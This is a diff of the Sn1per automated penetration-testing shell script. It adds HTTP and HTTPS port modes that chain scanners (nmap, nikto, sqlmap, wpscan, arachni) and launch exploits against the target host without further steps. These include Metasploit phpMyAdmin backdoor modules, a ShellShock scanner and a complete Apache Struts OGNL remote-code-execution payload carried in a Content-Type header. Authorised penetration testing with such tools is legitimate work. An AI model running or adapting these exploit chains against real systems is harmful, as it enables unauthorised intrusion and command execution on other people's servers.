@@ -314,12 +245,23 @@ else
SCAN_TYPE="DOMAIN"
fi
# INITILIZE()
# INITILIZE
init
# CHECK CONNECTION STATUS
check_online
# CHECK FOR UPDATES
check_update
# CHECK FOR BLACKARCH LINUX
if grep -q BlackArch /etc/issue; then
DISTRO='blackarch'
echo "Detected BlackArch GNU/Linux"
INSTALL_DIR=$(pwd)
echo "Setting current path to $INSTALL_DIR"
fi
if [ "$MODE" = "report" ]; then
$INSTALL_DIR/sniper $TARGET | tee $LOOT_DIR/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
exit
@@ -360,17 +302,10 @@ if [ "$MODE" = "discover" ]; then
cat $LOOT_DIR/domains/sniper-ping-ips.txt $LOOT_DIR/domains/sniper-tcp-ips.txt $LOOT_DIR/domains/sniper-udp-ips.txt > $LOOT_DIR/domains/sniper-ips-unsorted.txt
sort -u $LOOT_DIR/domains/sniper-ips-unsorted.txt > $LOOT_DIR/domains/sniper-ips.txt
cat $LOOT_DIR/domains/sniper-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
echo ""
if [ "$OPT1" = "report" ]; then
for a in `cat $LOOT_DIR/domains/sniper-ips.txt`
do sniper $a report
done
exit
fi
for a in `cat $LOOT_DIR/domains/sniper-ips.txt`
do sniper $a
done
echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET"
echo -e "$OKRED[+]$RESET Target list saved to $LOOT_DIR/domains/sniper-ips.txt. "
echo -e "$OKREDTo scan all IP's, use sniper $LOOT_DIR/domains/sniper-ips.txt airstrike or nuke modes.$RESET"
loot
exit
fi
@@ -382,6 +317,380 @@ if [ "$MODE" = "web" ]; then
fi
fi
# WEBPORTHTTP MODE
if [ "$MODE" = "webporthttp" ]; then
if [ "$OPT2" = "report" ]; then
sniper $TARGET $MODE $OPT1 | tee $LOOT_DIR/sniper-$TARGET-$MODE-$OPT1`date +%Y%m%d%H%M`.txt 2>&1
loot
exit
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://crowdshield.com"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
echo -e ""
echo -e ""
echo -e " ; , "
echo -e " ,; '. "
echo -e " ;: :; "
echo -e " :: :: "
echo -e " :: :: "
echo -e " ': : "
echo -e " :. : "
echo -e " ;' :: :: ' "
echo -e " .' '; ;' '. "
echo -e " :: :; ;: :: "
echo -e " ; :;. ,;: :: "
echo -e " :; :;: ,;\" :: "
echo -e " ::. ':; ..,.; ;:' ,.;: "
echo -e " \"'\"... '::,::::: ;: .;.;\"\"' "
echo -e " '\"\"\"....;:::::;,;.;\"\"\" "
echo -e " .:::.....'\"':::::::'\",...;::::;. "
echo -e " ;:' '\"\"'\"\";.,;:::::;.'\"\"\"\"\"\" ':; "
echo -e " ::' ;::;:::;::.. :; "
echo -e " :: ,;:::::::::::;:.. :: "
echo -e " ;' ,;;:;::::::::::::::;\";.. ':."
echo -e " :: ;:\" ::::::\"\"\"':::::: \": ::"
echo -e " :. :: ::::::; ::::::: : ; "
echo -e " ; :: ::::::: ::::::: : ; "
echo -e " ' :: ::::::....:::::' ,: ' "
echo -e " ' :: :::::::::::::\" :: "
echo -e " :: ':::::::::\"' :: "
echo -e " ': \"\"\"\"\"\"\"' :: "
echo -e " :: ;: "
echo -e " ':; ;:\" "
echo -e " -hrr- '; ,;' "
echo -e " \"' '\" "
echo -e " ''''$RESET"
PORT="$OPT1"
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
nmap -sV -Pn -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-http-$TARGET.xml
port_http=`grep 'portid="'$PORT'"' $LOOT_DIR/nmap/nmap-http-$TARGET.xml | grep open`
if [ -z "$port_http" ]; then
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
wafw00f http://$TARGET:$PORT
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
whatweb http://$TARGET:$PORT
xsstracer $TARGET $PORT
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET"
echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET:$PORT | egrep -i 'X-Content' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET:$PORT | egrep -i 'X-Frame' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET:$PORT | egrep -i 'X-XSS' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I -X OPTIONS http://$TARGET:$PORT | grep Allow | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I -X TRACE http://$TARGET:$PORT | grep TRACE | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET:$PORT | egrep -i meta --color=auto | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
curl -s --insecure -x http://$TARGET:$PORT -L http://google.com | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET:$PORT | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET:$PORT | egrep -i "Strict-Transport-Security" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET:$PORT/crossdomain.xml | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET:$PORT/clientaccesspolicy.xml | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET:$PORT | egrep -i "Access-Control-Allow-Origin" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET:$PORT/robots.txt | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET:$PORT/sitemap.xml | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET:$PORT | egrep -i "Cookie:" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET:$PORT/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10
curl -s --insecure http://$TARGET:$PORT/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
echo ""
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
nikto -h http://$TARGET:$PORT
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port$PORT.jpg"
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg
else
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg
fi
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
#dirb http://$TARGET:$PORT
python $PLUGINS_DIR/cansina/cansina.py -u http://$TARGET:$PORT -p $PLUGINS_DIR/cansina/dirbuster-quick.txt
echo -e "$OKGREEN + -- ----------------------------=[Enumerating Common Web Software]=--------- -- +$RESET"
clusterd -i $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
wpscan --url http://$TARGET:$PORT --batch
echo ""
wpscan --url http://$TARGET:$PORT/wordpress/ --batch
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET"
python $CMSMAP -t http://$TARGET:$PORT
echo ""
python $CMSMAP -t http://$TARGET/wordpress/
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
mkdir -p $INSTALL_DIR/loot/web/$TARGET-http-$PORT/ 2> /dev/null
arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-http-$PORT/ --output-only-positives http://$TARGET:$PORT
cd $INSTALL_DIR/loot/web/$TARGET-http-$PORT/
arachni_reporter $INSTALL_DIR/loot/web/$TARGET-http-$PORT/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-http-$PORT/arachni.zip
unzip $INSTALL_DIR/loot/web/$TARGET-http-$PORT/arachni.zip
cd $INSTALL_DIR
echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
sqlmap -u "http://$TARGET:$PORT" --batch --crawl=5 --level 1 --risk 1 -f -a
echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT $PORT; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port $PORT
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}'" http://$TARGET:$PORT | head -n 1
if [ $SCAN_TYPE == "DOMAIN" ]; then
if [ "$GOOHAK" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
goohak $TARGET > /dev/null
fi
echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
GHDB="1"
fi
fi
exit
fi
# WEBPORTHTTPS MODE
if [ "$MODE" = "webporthttps" ]; then
if [ "$OPT2" = "report" ]; then
sniper $TARGET $MODE $OPT1 | tee $LOOT_DIR/sniper-$TARGET-$MODE-$OPT1`date +%Y%m%d%H%M`.txt 2>&1
loot
exit
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://crowdshield.com"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
echo -e ""
echo -e ""
echo -e " ; , "
echo -e " ,; '. "
echo -e " ;: :; "
echo -e " :: :: "
echo -e " :: :: "
echo -e " ': : "
echo -e " :. : "
echo -e " ;' :: :: ' "
echo -e " .' '; ;' '. "
echo -e " :: :; ;: :: "
echo -e " ; :;. ,;: :: "
echo -e " :; :;: ,;\" :: "
echo -e " ::. ':; ..,.; ;:' ,.;: "
echo -e " \"'\"... '::,::::: ;: .;.;\"\"' "
echo -e " '\"\"\"....;:::::;,;.;\"\"\" "
echo -e " .:::.....'\"':::::::'\",...;::::;. "
echo -e " ;:' '\"\"'\"\";.,;:::::;.'\"\"\"\"\"\" ':; "
echo -e " ::' ;::;:::;::.. :; "
echo -e " :: ,;:::::::::::;:.. :: "
echo -e " ;' ,;;:;::::::::::::::;\";.. ':."
echo -e " :: ;:\" ::::::\"\"\"':::::: \": ::"
echo -e " :. :: ::::::; ::::::: : ; "
echo -e " ; :: ::::::: ::::::: : ; "
echo -e " ' :: ::::::....:::::' ,: ' "
echo -e " ' :: :::::::::::::\" :: "
echo -e " :: ':::::::::\"' :: "
echo -e " ': \"\"\"\"\"\"\"' :: "
echo -e " :: ;: "
echo -e " ':; ;:\" "
echo -e " -hrr- '; ,;' "
echo -e " \"' '\" "
echo -e " ''''$RESET"
PORT="$OPT1"
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
nmap -sV -T5 -Pn -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-https-$TARGET.xml
port_https=`grep 'portid="'$PORT'"' $LOOT_DIR/nmap/nmap-https-$TARGET.xml | grep open`
if [ -z "$port_https" ];
then
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
wafw00f https://$TARGET:$PORT
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +$RESET"
cd $PLUGINS_DIR/CloudFail/
python3 cloudfail.py --target $TARGET
cd $INSTALL_DIR
echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
whatweb https://$TARGET:$PORT
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
sslscan --no-failed $TARGET
testssl $TARGET
echo ""
if [ $DISTRO == "blackarch" ]; then
massbleed $TARGET port $PORT
else
cd $PLUGINS_DIR/MassBleed
./massbleed $TARGET port $PORT
fi
cd $INSTALL_DIR
echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET"
echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET:$PORT | egrep -i 'X-Content' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET:$PORT | egrep -i 'X-Frame' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET:$PORT | egrep -i 'X-XSS' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I -X OPTIONS https://$TARGET:$PORT | grep Allow
echo ""
echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I -X TRACE https://$TARGET:$PORT | grep TRACE
echo ""
echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
curl -s --insecure https://$TARGET:$PORT | egrep -i meta --color=auto | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
curl -x https://$TARGET:$PORT -L https://google.com -s --insecure | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET:$PORT | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET:$PORT/ | egrep -i "Strict-Transport-Security" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE"
curl -s --insecure https://$TARGET:$PORT/crossdomain.xml | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE"
curl -s --insecure https://$TARGET:$PORT/clientaccesspolicy.xml | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET:$PORT | egrep -i "Access-Control-Allow-Origin" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE"
curl -s --insecure https://$TARGET:$PORT/robots.txt | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE"
curl -s --insecure https://$TARGET:$PORT/sitemap.xml | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET:$PORT | egrep -i "Cookie:" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE"
curl -s --insecure https://$TARGET:$PORT/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10
curl -s --insecure https://$TARGET:$PORT/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
echo ""
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
nikto -h https://$TARGET:$PORT
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg
else
cutycapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg
fi
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port$PORT.jpg"
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -sV -T5 -Pn -p $PORT --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
#dirb https://$TARGET:$PORT
python $PLUGINS_DIR/cansina/cansina.py -u https://$TARGET:$PORT -p $PLUGINS_DIR/cansina/dirbuster-quick.txt
echo -e "$OKGREEN + -- ----------------------------=[Enumerating Common Web Software]=--------- -- +$RESET"
clusterd --ssl -i $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
wpscan --url https://$TARGET:$PORT --batch
echo ""
wpscan --url https://$TARGET:$PORT/wordpress/ --batch
echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET"
python $CMSMAP -t https://$TARGET:$PORT
echo ""
python $CMSMAP -t https://$TARGET:$PORT/wordpress/
echo ""
if [ $ARACHNI == "1" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Arachni Scan]=------------------- -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
mkdir -p $INSTALL_DIR/loot/web/$TARGET-https-$PORT/ 2> /dev/null
arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-https-$PORT/ --output-only-positives https://$TARGET:$PORT
cd $INSTALL_DIR/loot/web/$TARGET-https-$PORT/
arachni_reporter $INSTALL_DIR/loot/web/$TARGET-https-$PORT/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-https-$PORT/arachni.zip
unzip $INSTALL_DIR/loot/web/$TARGET-https-$PORT/arachni.zip
cd $INSTALL_DIR
fi
echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
sqlmap -u "https://$TARGET:$PORT" --batch --crawl=5 --level 1 --risk 1 -f -a
echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET:$PORT | head -n 1
if [ $SCAN_TYPE == "DOMAIN" ];
then
if [ -z $GHDB ];
then
if [ "$GOOHAK" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
goohak $TARGET > /dev/null
fi
echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
fi
fi
fi
exit
fi
if [ "$MODE" = "stealth" ]; then
if [ "$OPT1" = "report" ]; then
sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
@@ -396,7 +705,7 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
echo -e "$OKRED "
echo -e "$OKRED "
echo -e "$OKRED ./\."
echo -e "$OKRED ./ '\."
echo -e "$OKRED \. '\."
@@ -435,7 +744,8 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET"
whois $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET"
theharvester -d $TARGET -l 100 -b bing 2> /dev/null
theharvester -d $TARGET -l 200 -b all 2> /dev/null
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 200 -n 50 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
dig -x $TARGET
dnsenum $TARGET
@@ -531,6 +841,7 @@ if [ "$MODE" = "stealth" ]; then
echo -e ""
echo -e ""
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
loot
exit
fi
@@ -592,7 +903,8 @@ if [ "$MODE" = "airstrike" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET"
whois $a
echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET"
theharvester -d $a -l 100 -b bing 2> /dev/null
theharvester -d $a -l 200 -b all 2> /dev/null
metagoofil -d $a -t doc,pdf,xls,csv,txt -l 200 -n 50 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$a.html
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
dig -x $a
dnsenum $a
@@ -688,27 +1000,40 @@ if [ "$MODE" = "airstrike" ]; then
echo -e ""
echo -e ""
done;
loot
exit
fi
if [ "$MODE" = "fullportonly" ]; then
echo -e "$OKRED ___ ____ __ __ $RESET"
echo -e "$OKRED / _/_ __/ / /__ ___ ____/ /____ ___ / /_ __$RESET"
echo -e "$OKRED / _/ // / / / _ \/ _ \/ __/ __/ _ \/ _ \/ / // /$RESET"
echo -e "$OKRED /_/ \_,_/_/_/ .__/\___/_/ \__/\___/_//_/_/\_, / $RESET"
echo -e "$OKRED /_/ /___/ $RESET"
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Performing Port Scan]=------------------- -- +$RESET"
logo
if [ -z "$OPT1" ]; then
nmap -T4 -sV -O -v -p 1-65355 -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Enumerating Exploits]=------------------- -- +$RESET"
nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -sU -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SEARCHING FOR EXPLOITS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
searchsploit -v --nmap $LOOT_DIR/nmap/nmap-$TARGET.xml
searchsploit -v --nmap $LOOT_DIR/nmap/nmap-$TARGET-udp.xml
else
nmap -T4 -sV -O -v -p $OPT1 -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Enumerating Exploits]=------------------- -- +$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -A -v -T4 -p $OPT1 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -A -v -T4 -sU -p $OPT1 -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SEARCHING FOR EXPLOITS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
searchsploit -v --nmap $LOOT_DIR/nmap/nmap-$TARGET.xml
fi
echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DONE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
exit
fi
@@ -722,6 +1047,7 @@ fi
